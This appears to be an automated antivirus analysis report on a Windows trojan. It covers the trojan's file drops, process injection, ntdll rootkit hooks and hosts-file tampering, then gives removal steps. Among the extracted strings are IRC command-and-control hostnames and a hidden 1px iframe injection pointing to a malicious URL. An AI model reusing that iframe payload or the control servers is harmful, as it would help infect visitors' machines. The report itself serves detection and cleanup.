MD5: d76b22cf36c04a35e5d5ed96c001f8f1
SHA1: 09029be83d03586d4ff331fd3d436bd2081a6565
SHA256: a8846d844a545a7b916e709b697dda9ce6407643b3abe690099c56e06aec5ac8
SSDeep: 3072:jnyMSccsWlXCFLcVygpgMCVYI1wD3HbMKgTujWnnkX6Ya1EHfT9xOY3/199cnwpJ:jnyvDCao1E3HbokKYgiJck/z33mEqyT/
Size: 372764 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ntvdm.exe:796

The Trojan injects its code into the following process(es):

%original file name%.exe:264

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\d76b22cf36c04a35e5d5ed96c001f8f1.usr (87562 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (24546 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (614864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (579816 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (66577424 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)

The process ntvdm.exe:796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsA718.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsA707.tmp (335 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsA718.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsA707.tmp (0 bytes)

Registry activity

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
teredo.ipv6.microsoft.com	157.56.106.189
sys.zief.pl	148.81.111.121
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Reply Sinkhole - irc-sinkhole.cert.pl

Traffic

The Trojan connects to the servers at the folowing location(s):

`.rsrc

D$(PSSh

ccRegVfy.exe

ccApp.exe

IEXPLORE.EXE

windows

\*.exe

.text

.data

.rsrc

msvcrt.dll

KERNEL32.dll

nddeapir.pdb

_acmdln

m.Zw%

ADVAPI32.DLL

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoysys.zief.pl

core.ircgalaxy.pl

NICK avabcadz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 jL.chura.pl

#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

KERNEL32.DLL

windowsupdate

drweb

user32.dll

kernel32.dll

MSVCIRT.dll

MSVCRT.dll

5.1.2600.0 (xpclient.010817-1148)

NDDEAPIR.EXE

Windows

Operating System

5.1.2600.0

%original file name%.exe_264_rwx_00401000_00002000:

D$(PSSh

%original file name%.exe_264_rwx_00419000_00005000:

ADVAPI32.DLL

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoysys.zief.pl

core.ircgalaxy.pl

NICK avabcadz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 jL.chura.pl

#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

KERNEL32.DLL

windowsupdate

drweb

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   ntvdm.exe:796
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\d76b22cf36c04a35e5d5ed96c001f8f1.usr (87562 bytes)
   C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (24546 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (614864 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (579816 bytes)
   C:\Windows\USR_Shohdi_Photo_USR.exe (66577424 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsA718.tmp (269 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsA707.tmp (335 bytes)

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.